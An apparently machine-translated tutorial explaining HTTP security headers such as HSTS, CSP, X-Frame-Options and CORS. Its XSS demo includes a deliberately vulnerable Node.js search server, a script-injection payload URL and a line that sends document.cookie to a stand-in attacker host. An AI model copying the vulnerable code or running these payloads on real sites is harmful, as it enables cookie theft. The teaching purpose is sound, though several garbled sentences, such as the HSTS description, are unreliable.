How to increase the security of web applications using HTTP headers


This is the third part of the web security series: the first part was “How browsers work: an introduction to web application security” and the second was “Web Security: an introduction to HTTP”.

As we saw in the previous parts of this series, servers can send HTTP headers to give the client additional metadata about the response, on top of the content the client requested. Through these headers, the client is told how a specific resource should be read, cached, or secured.

Browsers currently implement a very wide range of security-related headers that make it harder for attackers to exploit vulnerabilities. In this article we will go through each of them, explaining how they are used, which attacks they prevent, and a bit of the history behind each header.

The post was written with the support of the EDISON Software company, which fights for the honor of Russian programmers and shares in detail their experience in developing complex software products .

HTTP Strict Transport Security (HSTS)

Since the end of 2012, it has become easier for supporters of “HTTPS Everywhere” to force the client to always use the secure version of the HTTP protocol thanks to Strict Transport Security: a very simple line

Strict-Transport-Security: max-age=3600will tell the browser that it will not interact with the application over the next hour (3600 seconds). When a user tries to access an application protected with HSTS via HTTP, the browser simply refuses to go further, automatically converting the URLs

http://to https://. You can check it locally with the github.com/odino/wasec/tree/master/hsts code . You will need to follow the instructions in the README (it includes installing a trusted SSL certificate for

localhostyour computer using the toolmkcert ) and then try to open https://localhost:7889. In this example, there are 2 servers: HTTPS, which listens



7889, and HTTP port 7888. When you access the HTTPS server, it will always try to redirect you to the HTTP version that will work because the HSTS is not on the HTTPS server. If instead you add a parameter hsts=onto your URL, the browser will force the link into a version https://. Since the server 7888is not available only via the http protocol, you will eventually look at a page that looks something like this.
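As a rough illustration of the header described above, here is a minimal Node.js sketch. The helper names `hstsValue` and `withHsts` are hypothetical and are not taken from the wasec example; the sketch only builds the header value and attaches it to every response of a handler.

```javascript
// Hypothetical helpers, not part of the wasec repository.

// Builds the value of the Strict-Transport-Security header.
function hstsValue({ maxAge, includeSubDomains = false }) {
  if (!Number.isInteger(maxAge) || maxAge < 0) {
    throw new RangeError('maxAge must be a non-negative integer (seconds)')
  }
  return includeSubDomains
    ? `max-age=${maxAge}; includeSubDomains`
    : `max-age=${maxAge}`
}

// Wraps a Node.js request handler so that every response carries the header.
// Browsers only honor HSTS when it is received over HTTPS, so this wrapper
// is meant for the handler of the HTTPS server.
function withHsts(handler, options) {
  const value = hstsValue(options)
  return (req, res) => {
    res.setHeader('Strict-Transport-Security', value)
    return handler(req, res)
  }
}
```

Assuming an existing handler `app` and TLS options `tlsOptions` (both placeholders), this could be wired up as `require('https').createServer(tlsOptions, withHsts(app, { maxAge: 3600 })).listen(7889)`.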

You may be interested to know what happens when a user visits your site for the first time, because the HSTS policy is not predetermined: attackers could potentially deceive the user according to



http://your site and conduct an attack there, so there is still room for problems. This is a serious problem, since HSTS is a trust mechanism when first used. He is trying to make sure that after visiting the website, the browser knows that the subsequent interaction should use HTTPS. To circumvent this drawback could be through the support of a huge database of websites that support HSTS, which Chrome does through hstspreload.org . You must first establish your policy, then visit the website and check if it can be added to the database. For example, we can see that Facebook is on the list.

By submitting your website to this list, you tell browsers in advance that your site uses HSTS, so even the first interaction between clients and your server happens over a secure channel. This comes at a cost, though, because you really need to commit to HSTS. If, for any reason, you want your website removed from the list, that is no easy task for browser vendors:

“Keep in mind that inclusion in the preload list cannot be easily undone. Domains can be removed, but it takes months for the change to reach Chrome users, and we cannot make guarantees about other browsers. Do not request inclusion in the list unless you are sure that you can support HTTPS for your entire site and all its subdomains in the long term.”

- Source: https://hstspreload.org/

This is because the vendor cannot guarantee that all users will be on the latest version of their browser, with your site removed from the list. Think carefully, and make a decision based on your degree of confidence in HSTS and your ability to support it in the long run.
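Before submitting a site, it can help to check the header you are serving. The sketch below assumes the header requirements listed on hstspreload.org at the time of writing (a max-age of at least one year, plus the includeSubDomains and preload directives). These thresholds are not stated in this article and may change, and the function names are hypothetical.

```javascript
// Parses a Strict-Transport-Security value into a map of directives.
function parseHsts(value) {
  const directives = {}
  for (const part of value.split(';')) {
    const [name, raw] = part.trim().split('=')
    if (name) {
      directives[name.toLowerCase()] = raw === undefined ? true : raw.replace(/"/g, '')
    }
  }
  return directives
}

// Assumption: one year, the minimum max-age documented on hstspreload.org.
const ONE_YEAR_IN_SECONDS = 31536000

// Returns true when the header value satisfies the assumed preload rules.
function meetsPreloadHeaderRules(value) {
  const d = parseHsts(value)
  const maxAge = Number.parseInt(d['max-age'], 10)
  return maxAge >= ONE_YEAR_IN_SECONDS && d.includesubdomains === true && d.preload === true
}
```

With this sketch, the one-hour policy used earlier in this section would be rejected, which matches the idea that preloading is a long-term commitment.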

HTTP Public Key Pinning (HPKP)

HTTP Public Key Pinning is a mechanism that lets us tell the browser which SSL certificates to expect when connecting to our servers. Like HSTS, this header is a trust-on-first-use mechanism: once the client has connected to our server, it stores the certificate information for subsequent interactions. If at some point the client finds that the server is using a different certificate, it politely refuses to connect, which makes man-in-the-middle (MITM) attacks very difficult to carry out.

This is what the HPKP policy looks like:

Public-Key-Pins:
  pin-sha256="9yw7rfw9f4hu9eho4fhh4uifh4ifhiu=";
  pin-sha256="cwi87y89f4fh4fihi9fhi4hvhuh3du3=";
  max-age=3600; includeSubDomains;
  report-uri="https://pkpviolations.example.org/collect"

The header declares which certificates the server will use (two of them in this case) by their hashes, and includes additional information such as the lifetime of the directive (max-age=3600) and a few other details.

Unfortunately, there is little point in digging deeper into what public key pinning can do, because Chrome has deprecated the feature, a signal that its adoption is doomed. Chrome's decision is not irrational; it is simply a consequence of the risks that come with pinning public keys. If you lose your certificate, or simply make a mistake while testing, your site becomes unavailable to users who have visited it before (for the duration of the max-age directive, which is usually weeks or months).

Because of these potentially catastrophic consequences, adoption of HPKP was extremely low, and there were cases where large websites became unavailable due to misconfiguration. With all this in mind, Chrome decided that users would be better off without the protection offered by HPKP, and security researchers are not entirely against this decision.

Expect-CT

While HPKP has been deprecated, a new header has stepped in to prevent fraudulent SSL certificates from being served to clients: Expect-CT.

The purpose of this header is to tell the browser to perform additional “background checks” to make sure the certificate is genuine: when the server uses the Expect-CT header, it is essentially asking the client to verify that the certificates in use appear in public Certificate Transparency (CT) logs.

The Certificate Transparency initiative is an effort led by Google to provide:

“An open framework for monitoring and auditing SSL certificates in near real time. In particular, Certificate Transparency makes it possible to detect SSL certificates that were mistakenly issued by a certificate authority or maliciously acquired from an otherwise unimpeachable certificate authority. It also makes it possible to identify certificate authorities that have gone rogue and are maliciously issuing certificates.”

- Source: https://www.certificate-transparency.org/

The header takes this form:

Expect-CT: max-age=3600, enforce, report-uri="https://ct.example.com/report"

In this example, the server asks the browser to:

- enable CT verification for the current application for a period of 1 hour (3600 seconds)

- enforce this policy and deny access to the application if a violation occurs

- send a report to the specified URL if a violation occurs

The goal of the Certificate Transparency initiative is to detect mis-issued or malicious certificates (and rogue certificate authorities) earlier, faster, and more precisely than any method used before.
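To make the three parts of the header concrete, here is a small sketch that assembles an Expect-CT value from options. The function name `expectCtValue` and its option names are hypothetical; the output format simply follows the example header shown in this section.

```javascript
// Hypothetical helper: builds the value of an Expect-CT header.
function expectCtValue({ maxAge, enforce = false, reportUri }) {
  const parts = [`max-age=${maxAge}`]
  // "enforce" asks the browser to refuse the connection on a violation
  if (enforce) parts.push('enforce')
  // "report-uri" tells the browser where to send violation reports
  if (reportUri) parts.push(`report-uri="${reportUri}"`)
  return parts.join(', ')
}

const value = expectCtValue({
  maxAge: 3600,
  enforce: true,
  reportUri: 'https://ct.example.com/report',
})
```

Leaving out `enforce` while keeping `reportUri` gives a policy that only reports violations, which may be a gentler way to try the header first.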

By opting in with the Expect-CT header, you can take advantage of this initiative to improve the security posture of your application.

X-Frame-Options



Imagine that you see a webpage like this.

As soon as you click a link, you realize that all the money in your bank account has disappeared. What happened?

You have been the victim of a clickjacking attack.



The attacker sent you to their website, which displays a very attractive link to click. Unfortunately, they also embedded an iframe pointing to your-bank.com/transfer?amount=-1&attacker@gmail.com in the page, but hid it by setting its opacity to 0%. You thought you had clicked on the original page, trying to win a brand-new Hummer, but instead the browser registered a click on the iframe, a dangerous click that confirmed the money transfer. Most banking systems require a one-time PIN to confirm transactions, but your bank has not caught up with the times, and all your money is gone.

The example is quite extreme, but it should give you an idea of what the consequences of a clickjacking attack can be. The user intends to click on a specific link, while the browser registers the click on the “invisible” page that was embedded as a frame.

I have included an example of this vulnerability at github.com/odino/wasec/tree/master/clickjacking. If you run the example and try to click on the “attractive” link, you will see that the actual click is intercepted by the iframe, which then turns its opacity up so that you can spot the problem more easily. The example should be available at http://localhost:7888.

Fortunately, browsers have come up with a simple solution to this problem: X-Frame-Options (XFO), which lets you decide whether your application can be embedded as an iframe on external websites. Popularized by Internet Explorer 8, XFO was first introduced in 2009 and is still supported by all major browsers. It works like this: when the browser encounters an iframe, it loads it and checks that its XFO allows it to be included in the current page before rendering it.

Supported values:

- DENY: this web page cannot be embedded anywhere. This is the highest level of protection, since it does not allow anyone to embed our content.

- SAMEORIGIN: this page can only be embedded by pages from the same domain as the current one. This means that example.com/embedder can load example.com/embedded in an iframe if its policy is set to SAMEORIGIN. This is a more relaxed policy that lets the owners of a website embed their own pages across their application.

- ALLOW-FROM uri: embedding is allowed from the specified URI. We could, for example, let an authorized external website embed our content with ALLOW-FROM https://external.com. This is generally used when you intend to let third-party developers embed your content via iframes.
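The decision the browser makes for each value can be modeled with a small function. This is only a simplified sketch of the rules listed above, not how any browser is actually implemented: the name `mayEmbed` is hypothetical, it looks at a single embedding page rather than the whole chain of frames, and it treats unrecognized values as a refusal, which real browsers may not do.

```javascript
// Simplified model: may the page at `embedderUrl` show `embeddedUrl`
// in an iframe, given the X-Frame-Options value sent with the embedded page?
function mayEmbed(xfo, embedderUrl, embeddedUrl) {
  const value = (xfo || '').trim()
  if (value === '') return true // no header: framing is not restricted

  const upper = value.toUpperCase()
  if (upper === 'DENY') return false

  const embedderOrigin = new URL(embedderUrl).origin
  if (upper === 'SAMEORIGIN') {
    return embedderOrigin === new URL(embeddedUrl).origin
  }
  if (upper.startsWith('ALLOW-FROM ')) {
    const allowed = value.slice('ALLOW-FROM '.length).trim()
    return embedderOrigin === new URL(allowed).origin
  }
  return false // assumption of this sketch: unknown values fail closed
}
```

For instance, with SAMEORIGIN a page on example.com may frame another page on example.com, while the attacker's page on a different domain may not.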

An example of an HTTP response that includes the strictest possible XFO policy is as follows:

HTTP/1.1 200 OK

Content-Type: application/json

X-Frame-Options: DENY



...To demonstrate how browsers behave when XFO is turned on, we can simply change our example URL to

http://localhost:7888 /?xfo=on. The parameter xfo=ontells the server to include in the response X-Frame-Options: deny, and we can see how the browser restricts access to the iframe:

XFO was considered the best way to prevent attacks using frame-based clicks until after a few years one more header entered the game - Content Security Policy or CSP for short.

Content Security Policy (CSP)

The header



Content-Security-Policy, abbreviated CSP, provides next-generation utilities to prevent multiple attacks, from XSS (cross-site scripting) to intercepting clicks (click-jacking). To understand how CSP helps us, you first need to think about the attack vector. Suppose we just created our own search engine Google, where there is a simple input field with a submit button.

This web application does nothing magical. It is simple,

- displays the form

- allows the user to perform a search

- displays search results along with the keyword that the user was searching for



When we perform a simple search, the application returns the following:

Amazing! Our application incredibly understood our search and found a similar image. If we delve into the source code available at github.com/odino/wasec/tree/master/xss , we will soon realize that the application is a security issue, since any keyword that the user is looking for is directly printed in HTML:

var qs = require('querystring')

var url = require('url')

var fs = require('fs')

require('http').createServer((req, res) => {

let query = qs.parse(url.parse(req.url).query)

let keyword = query.search || ''

let results = keyword ? `You searched for "${keyword}", we found:</br><imgsrc="http://placekitten.com/200/300" />` : `Try searching...`

res.end(fs.readFileSync(__dirname + '/index.html').toString().replace('__KEYWORD__', keyword).replace('__RESULTS__', results))

}).listen(7888)

<html><body><h1>Search The Web</h1><form><inputtype="text"name="search"value="__KEYWORD__" /><inputtype="submit" /></form><divid="results">

__RESULTS__



</div></body></html>This represents an unpleasant consequence. An attacker could create a specific link that executes arbitrary javascript in the victim’s browser.



If you have the time and patience to run the example locally, you can quickly understand the full power of the CSP. I added a query string parameter that includes CSP, so we can try to navigate to the malicious URL with CSP enabled:

localhost : 7888 /? search =% 3Cscript + type% 3D% 22text% 2Fjavascript% 22% 3Ealert% 28% 27You% 20have% 20been% 20PWNED% 27% 29% 3C% 2Fscript% 3E & csp = on

As you can see in the example above, we told the browser that our CSP policy only allows scripts included from the same source of the current URL, which we can easily check by accessing the URL using curl and viewing the response header:

$ curl -I "http://localhost:7888/?search=%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27You%20have%20been%20PWNED%27%29%3C%2Fscript%3E&csp=on"

HTTP/1.1 200 OK

X-XSS-Protection: 0

Content-Security-Policy: default-src 'self'

Date: Sat, 11 Aug 2018 10:46:27 GMT

Connection: keep-aliveSince the XSS attack was carried out using an embedded script (a script directly embedded in the HTML content), the browser politely refused to execute it, ensuring the security of our user. Imagine that instead of simply displaying a warning dialog, an attacker would set up a redirect to his own domain through some JavaScript code that might look like this:

window.location = `attacker.com/${document.cookie}`They could steal all user cookies that may contain highly sensitive data (more on this in the next article).
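For readers who do not want to open the repository, the server side of the `csp=on` toggle could look roughly like the sketch below. It is an assumption about how such a switch might be written, not the actual wasec code, and the function name `applyCsp` is hypothetical.

```javascript
// Hypothetical sketch: sets a CSP header when the URL contains csp=on.
// `req` and `res` are the usual Node.js http request and response objects.
function applyCsp(req, res) {
  // req.url is relative, so a base is needed to parse it (the port is the article's)
  const { searchParams } = new URL(req.url, 'http://localhost:7888')
  if (searchParams.get('csp') === 'on') {
    // Only allow resources (including scripts) from the page's own origin;
    // inline scripts such as the injected <script> tag are refused.
    res.setHeader('Content-Security-Policy', "default-src 'self'")
  }
}
```

Calling `applyCsp(req, res)` at the top of the request handler, before `res.end(...)`, would be enough for the browser to block the injected inline script.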

It should be clear by now how CSP helps us prevent a number of attacks on web applications. You define a policy, and the browser will strictly adhere to it, refusing to launch resources that violate the policy.

An interesting CSP option is report-only mode. Instead of using the Content-Security-Policy header, you can first test the impact of CSP on your site by telling the browser to simply report violations, without blocking script execution and so on, through the Content-Security-Policy-Report-Only header.

The reports let you understand which breaking changes the CSP policy you would like to roll out might cause, so you can fix them accordingly. We can even specify a report URL, and the browser will send the reports there. Here is a complete example of a report-only policy:

Content-Security-Policy-Report-Only: default-src 'self'; report-uri http://cspviolations.example.com/collector

CSP policies themselves can get a bit complicated, as in the following example:

Content-Security-Policy: default-src 'self'; script-src scripts.example.com; img-src *; media-src medias.example.com medias.legacy.example.com

This policy defines the following rules:

- executable scripts (for example, JavaScript) can only be loaded from scripts.example.com

- images can be loaded from any origin (img-src *)

- video or audio content can be loaded from two origins: medias.example.com and medias.legacy.example.com
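Longer policies are easier to maintain as data than as a hand-written string. The sketch below, with the hypothetical helper `buildCsp`, rebuilds the policy from this section out of a plain object that maps each directive to its list of sources.

```javascript
// Hypothetical helper: turns { directive: [sources] } into a CSP header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ')
}

const policy = buildCsp({
  'default-src': ["'self'"],
  'script-src': ['scripts.example.com'],
  'img-src': ['*'],
  'media-src': ['medias.example.com', 'medias.legacy.example.com'],
})
```

The same value can be sent under either header name, so trying a change in report-only mode first only requires swapping the name passed to `res.setHeader`.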

As you can see, policies can get lengthy, and if we want to give our users the highest level of protection, writing them can become a rather tedious process. Nevertheless, writing a comprehensive CSP policy is an important step towards adding an extra layer of security to our web applications.

For more information on CSP, I recommend developer.mozilla.org/en-US/docs/Web/HTTP/CSP.

X-XSS-Protection





Although it is replaced by CSP, the header

X-XSS-Protectionprovides a similar type of protection. This header is used to mitigate XSS attacks in older browsers that do not fully support CSP. This title is not supported by Firefox. Its syntax is very similar to what we just saw:

X-XSS-Protection: 1; report=http://xssviolations.example.com/collectorReflected XSS is the most common type of attack, where the entered text is printed by the server without any verification, and this is where this header really resolves. If you want to see it yourself, I would recommend trying the example at github.com/odino/wasec/tree/master/xss , because by adding

xss=onto the URL, it shows what the browser does when XSS protection is on. If we enter a malicious string in the search field, such as, the browser will politely refuse to execute the script and explain the reason for its decision:The XSS Auditor refused to execute a script in

'http://localhost:7888/?search=%3Cscript%3Ealert%28%27hello%27%29%3C%2Fscript%3E&xss=on'

because its source code was found within the request.

The server sent an 'X-XSS-Protection' header requesting this behavior.Even more interesting is the default behavior in Chrome, when a CSP or XSS policy is not specified on a webpage. A script that we can test by adding a parameter

xss=offto our URL ( http://localhost:7888/?search=%3Cscript%3Ealert%28%27hello%27%29%3C%2Fscript%3E&xss=off):

Surprisingly, Chrome is careful enough to prevent the page from being rendered, which makes it difficult to create a reflected XSS. It is impressive how far the browsers have gone.

Feature policy

In July 2018, security researcher Scott Helme published a very interesting blog post describing a new security header in detail: Feature-Policy. Currently supported by very few browsers (Chrome and Safari at the time of writing), this header lets us define whether a particular browser feature is enabled on the current page. With a syntax very similar to CSP, we should have no trouble understanding what a feature policy such as the following means:

Feature-Policy: vibrate 'self'; push *; camera 'none'

If we still have doubts about how this policy affects the browser APIs, we can simply dissect it:

- vibrate 'self': allows the current page, and any frame on the current site, to use the vibration API

- push *: the current page and any frame can use the push notification API

- camera 'none': access to the camera API is denied to this page and to any frame
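The same dissection can be done in code. This sketch parses a Feature-Policy value into a map from feature name to allowlist; `parseFeaturePolicy` and `pageMayUse` are hypothetical names, and the check only covers the three allowlist forms used in the example above.

```javascript
// Splits "feature allowlist; feature allowlist" into { feature: [allowlist] }.
function parseFeaturePolicy(value) {
  const policy = {}
  for (const directive of value.split(';')) {
    const [feature, ...allowlist] = directive.trim().split(/\s+/)
    if (feature) policy[feature] = allowlist
  }
  return policy
}

// True when the page that sent the policy may itself use the feature.
// Features the policy does not mention return undefined, because their
// behavior depends on browser defaults this sketch does not model.
function pageMayUse(policy, feature) {
  const allowlist = policy[feature]
  if (allowlist === undefined) return undefined
  return allowlist.includes('*') || allowlist.includes("'self'")
}

const parsed = parseFeaturePolicy("vibrate 'self'; push *; camera 'none'")
```

Here `pageMayUse(parsed, 'camera')` is false, while `vibrate` and `push` are both allowed for the page itself.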

Feature policies have a short history. If your site lets users, for example, take selfies or record audio, it would be very useful to set a policy that prevents other contexts from accessing those APIs through your page.

X-Content-Type-Options

Sometimes clever browser features end up hurting us from a security standpoint. A prime example is MIME sniffing, a technique popularized by Internet Explorer.

MIME sniffing is the browser's ability to automatically detect (and correct) the content type of a resource it is loading. For example, we ask the browser to render the image /awesome-picture.png, but the server sets the wrong type when serving it (for example, Content-Type: text/plain). This would normally prevent the browser from displaying the image correctly. To solve this problem, IE went to great lengths to implement MIME sniffing: when loading a resource, the browser “scans” it and, if it detects that the content type of the resource is not the one declared by the server in the Content-Type header, it ignores the type sent by the server and interprets the resource according to the type it detected.

Now imagine hosting a website that lets users upload their own images, and imagine a user uploading a file /test.jpg that contains JavaScript code. See where this is going? Once the file is uploaded, the site includes it in its own HTML and, when the browser tries to render the document, it finds the “image” the user has just uploaded. When the browser loads the image, it detects that it is actually a script and executes it in the victim's browser.

To avoid this problem, we can set the X-Content-Type-Options: nosniff header, which completely disables MIME sniffing. By doing so, we tell the browser that we are fully aware that some files may have a mismatch between their type and their content, and that the browser should not worry about it. We know what we are doing, so the browser should not try to guess, potentially creating a security risk for our users.

Cross-Origin Resource Sharing (CORS)

In the browser, JavaScript can by default only make HTTP requests to its own origin. Simply put, an AJAX request from example.com can only connect to example.com.

This is because your browser holds information that is valuable to an attacker: cookies, which are typically used to keep track of a user's session. Imagine an attacker setting up a malicious page at win-a-hummer.com that immediately fires an AJAX request to your-bank.com. If you are logged in to the bank's website, the attacker can execute HTTP requests with your credentials, potentially stealing information or, even worse, wiping out your bank account.

In some cases, however, it is necessary to perform AJAX requests across origins, and for this reason browsers implemented Cross-Origin Resource Sharing (CORS), a set of directives that allow cross-domain requests.

The mechanism behind CORS is rather complex, and it would not be practical to go through the entire specification here, so I will focus on a “trimmed-down” version of CORS.

All you need to know at the moment is that with the help of the header

Access-Control-Allow-Originyour application tells the browser that you can receive requests from other sources. The most convenient form of this header is



Access-Control-Allow-Origin: *, which allows any source to access our application, but we can limit it by simply adding the URL we want to add to the white list using Access-Control-Allow-Origin: https://example.com. If we look at an example at github.com/odino/wasec/tree/master/cors , we will see how the browser prevents access to the resource from another source. I set up an example to make an AJAX request from

test-corsto test-cors-2and display the result of the operation in the browser. When the test-cors-2 server is instructed to use CORS, the page works as you expect. Try to go to http://cors-test:7888/?cors=on



But when we remove the parameter

corsfrom the URL, the browser intervenes and denies us access to the content of the response:

An important aspect that we need to understand is that the browser executed the request, but did not allow the client to access it. This is extremely important, as it still leaves us vulnerable if our request would cause any side effect on the server. Imagine, for example, that our bank would allow money transfer by simply calling the link.

my-bank.com/transfer?amount=1000&from=me&to=attacker.It would be a disaster! As we saw at the beginning of this article,



GETqueries must be idempotent, but what happens if we try to initiate a POSTquery? Fortunately, I included this script in the example, so we can try it by going to http://cors-test:7888/?method=POST:

Instead of performing our query directly

POSTwhich could potentially cause serious problems on the server, the browser sent a “pre-check” request. This is nothing more than a request OPTIONSto the server with a request to check whether our origin is allowed. In this case, the server did not respond positively, so the browser stops the process, and our request POSTnever reaches the goal. This tells us a couple of things:

- CORS is not a simple specification. There are quite a few scenarios to keep in mind, and you can easily get lost in the nuances of features such as preflight requests.

- Never expose APIs that change state through GET. An attacker can trigger these requests without a preflight request, which means there is no protection at all.
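The server side of this exchange can be sketched as a handler that answers preflight requests and adds Access-Control-Allow-Origin only for origins it trusts. This is an illustrative sketch, not the code of the cors example: the allowlist, the allowed methods and headers, the status codes, and the name `corsHandler` are all assumptions.

```javascript
// Assumption: the set of origins allowed to read our responses.
const ALLOWED_ORIGINS = new Set(['https://example.com'])

// `req` and `res` are the usual Node.js http request and response objects.
function corsHandler(req, res) {
  const origin = req.headers.origin
  const allowed = origin !== undefined && ALLOWED_ORIGINS.has(origin)

  if (allowed) {
    res.setHeader('Access-Control-Allow-Origin', origin)
    res.setHeader('Vary', 'Origin') // the response differs per origin
  }

  if (req.method === 'OPTIONS') {
    // Preflight: tell the browser whether the real request may be sent
    if (allowed) {
      res.setHeader('Access-Control-Allow-Methods', 'GET, POST')
      res.setHeader('Access-Control-Allow-Headers', 'Content-Type')
    }
    res.statusCode = allowed ? 204 : 403
    res.end()
    return
  }

  // The request itself is still processed even for other origins;
  // without the header the browser only hides the response from the caller.
  res.end(JSON.stringify({ ok: true }))
}
```

The last comment is the point made above: a handler like this does not stop a state-changing GET from running, so side effects need their own protection.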

In my experience, I have felt more comfortable setting up proxies that forward the request to the right server, all on the server side, rather than using CORS. This means that your application running at example.com can set up a proxy at example.com/_proxy/other.com, so that all requests falling under _proxy/other.com/* are forwarded to other.com.

I will wrap up my overview of this feature here but, if you are interested in understanding CORS in depth, MDN has a very long article that brilliantly covers the entire specification at developer.mozilla.org/en-US/docs/Web/HTTP/CORS.
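The routing part of such a proxy can be sketched as a pure function that maps an incoming path to the upstream URL. The `/_proxy/` prefix comes from the text above; the host allowlist, the use of HTTPS for the upstream, and the name `proxyTarget` are assumptions added for illustration (without an allowlist the endpoint would forward requests to any host).

```javascript
// Assumption: the only upstream hosts this proxy is willing to reach.
const ALLOWED_HOSTS = new Set(['other.com'])

// Maps "/_proxy/<host>/<path>" to "https://<host>/<path>",
// or returns null when the request should not be proxied.
function proxyTarget(requestUrl) {
  const match = /^\/_proxy\/([^/]+)(\/.*)?$/.exec(requestUrl)
  if (!match) return null
  const [, host, rest = '/'] = match
  if (!ALLOWED_HOSTS.has(host)) return null
  return `https://${host}${rest}`
}
```

The server would then perform the request to the returned URL itself and relay the response, so the browser only ever talks to example.com.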

X-Permitted-Cross-Domain-Policies

Closely related to CORS, X-Permitted-Cross-Domain-Policies targets cross-domain policies for Adobe products (namely Flash and Acrobat). I will not go into detail, as this header is intended for very specific use cases. In short, Adobe products handle cross-domain requests through a crossdomain.xml file in the root directory of the domain the request targets, and X-Permitted-Cross-Domain-Policies defines the policies for accessing this file.

Sounds complicated? I would simply suggest adding X-Permitted-Cross-Domain-Policies: none and ignoring clients that want to make cross-domain requests with Flash.

Referrer-Policy

At the beginning of our careers, we all probably made the same mistake: using the Referer header to implement a security restriction on our website. If the header contains a specific URL from a whitelist we define, we let users through.

OK, maybe that was not every one of us. But I am pretty damn sure I made this mistake back then: trusting the Referer header to give us reliable information about the origin the user comes from. The header was really useful until we figured out that sending this information to sites could pose a threat to our users' privacy.

The Referrer-Policy header, born in early 2017 and currently supported by all major browsers, can be used to mitigate these privacy concerns by telling the browser to either mask the URL in the Referer header or omit it altogether.

Here are some of the most common values Referrer-Policy can take:

- no-referrer: the Referer header is omitted entirely

- origin: turns https://example.com/private-page into https://example.com/

- same-origin: sends the Referer to same-site origins but omits it for everyone else
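The effect of these three values can be modeled with a short function that returns the Referer a browser would send when navigating from one URL to another. This is a simplified sketch of the rules listed above with a hypothetical name, `refererFor`; it covers only these three policies and ignores details such as downgrades from HTTPS to HTTP.

```javascript
// Returns the Referer value sent when going from `fromUrl` to `toUrl`
// under the given policy, or null when the header is omitted.
function refererFor(policy, fromUrl, toUrl) {
  const from = new URL(fromUrl)
  const to = new URL(toUrl)
  switch (policy) {
    case 'no-referrer':
      return null
    case 'origin':
      return `${from.origin}/`
    case 'same-origin':
      // full URL (without fragment) for same-origin targets, nothing otherwise
      return from.origin === to.origin
        ? `${from.origin}${from.pathname}${from.search}`
        : null
    default:
      throw new Error(`policy not covered by this sketch: ${policy}`)
  }
}
```

For example, with `origin` a visit from https://example.com/private-page to another site only reveals https://example.com/.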

It is worth noting that there are many more variations of Referrer-Policy (strict-origin, no-referrer-when-downgrade, etc.), but the ones mentioned above will probably cover most of your use cases. If you want to better understand each option you can use, I recommend heading to the OWASP page.

The Origin header is very similar to Referer, as it is sent by the browser in cross-domain requests to make sure the caller is allowed to access a resource on a different domain. The Origin header is controlled by the browser, so there is no way for malicious users to tamper with it. You might be tempted to use it as a firewall for your web application: if the Origin is on our whitelist, let the request go through.

One thing to consider, though, is that other HTTP clients, such as cURL, can present their own origin: a simple curl -H "Origin: example.com" api.example.com renders all origin-based firewall rules ineffective, and this is why you cannot rely on Origin (or Referer, as we have just seen) to build a firewall that keeps malicious clients out.

Testing your security

I want to wrap up this article with a reference to securityheaders.com, an incredibly useful website that lets you verify that your web application has the right security-related headers in place. After you submit a URL, you are given a grade and a header-by-header breakdown. Here is an example report for facebook.com:

If you are in doubt about where to start, securityheaders.com is a great place to get a first assessment.
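A much cruder local check can be scripted as well. The sketch below lists which of the headers discussed in this article are missing from a set of response headers. The selection in `RECOMMENDED` is my own assumption, it is not how securityheaders.com computes its grade, and the function name is hypothetical.

```javascript
// Assumption: a subset of the headers covered in this article.
const RECOMMENDED = [
  'strict-transport-security',
  'content-security-policy',
  'x-frame-options',
  'x-content-type-options',
  'referrer-policy',
]

// Takes an object of response headers and returns the recommended
// header names that are absent (header names are case-insensitive).
function missingSecurityHeaders(headers) {
  const present = new Set(Object.keys(headers).map((name) => name.toLowerCase()))
  return RECOMMENDED.filter((name) => !present.has(name))
}

const missing = missingSecurityHeaders({
  'Content-Type': 'text/html',
  'X-Frame-Options': 'DENY',
  'Strict-Transport-Security': 'max-age=3600',
})
```

In this example `missing` contains content-security-policy, x-content-type-options and referrer-policy. Presence alone says nothing about whether a header's value is sensible, which is where a full report is more useful.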

Stateful HTTP: managing sessions with cookies

This article should have introduced us to several interesting HTTP headers, helping us understand how they harden our web applications through protocol-specific features, with a bit of help from mainstream browsers.

In the next post, we will dig into one of the most misunderstood features of the HTTP protocol: cookies.

Born to bring some kind of state to the otherwise stateless HTTP, cookies have probably been used (and misused) by each of us to support sessions in our web applications: whenever there is some state we would like to persist, it is always easy to say “store it in a cookie.” As we will see, cookies are not always the safest of vaults, and must be treated with care when dealing with sensitive information.